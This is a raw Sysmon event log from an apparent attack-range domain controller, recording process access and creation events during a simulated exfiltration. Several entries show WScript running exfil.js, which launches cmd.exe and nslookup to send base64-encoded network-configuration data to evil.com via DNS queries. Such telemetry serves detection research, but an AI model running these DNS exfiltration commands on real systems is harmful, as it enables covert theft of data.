14:16:30.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.580{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5340-000000005F02}8092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.580{2E1864BB-17A1-629A-783D-000000005F02}55527512C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-5340-000000005F02}8092C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.582{2E1864BB-17BE-629A-5340-000000005F02}8092C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrovqi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.565{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllbglq.tmpMD5=A05FE277EAD578D85B93DE56B6EB0A01,SHA256=0DDAD6A171E00B4C55CFFC9B3292AFE046D71EAF195601FF934293413FA92292,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.534{2E1864BB-17BE-629A-5140-000000005F02}77524468C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5240-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.534{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.534{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5240-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.534{2E1864BB-17BE-629A-5040-000000005F02}4205704C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-5240-000000005F02}7620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.541{2E1864BB-17BE-629A-5240-000000005F02}7620C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-5040-000000005F02}420C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllbglq.tmp 2>&1 10341000x8000000000000000200108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.517{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5140-000000005F02}7752C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.517{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5140-000000005F02}7752C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.496{2E1864BB-17BE-629A-5140-000000005F02}77524468C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5040-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.481{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5140-000000005F02}7752C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.481{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.481{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.481{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5040-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.481{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.481{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.481{2E1864BB-17A1-629A-783D-000000005F02}55523732C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-5040-000000005F02}420C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.482{2E1864BB-17BE-629A-5040-000000005F02}420C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A KioqV2luMzJfTmV0d29ya0FkYXB0ZXJDb25maWd1cmF0aW9uKioq evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllbglq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.467{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfadpvv.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.433{2E1864BB-17BE-629A-4E40-000000005F02}2872660C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-4F40-000000005F02}7992C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.433{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 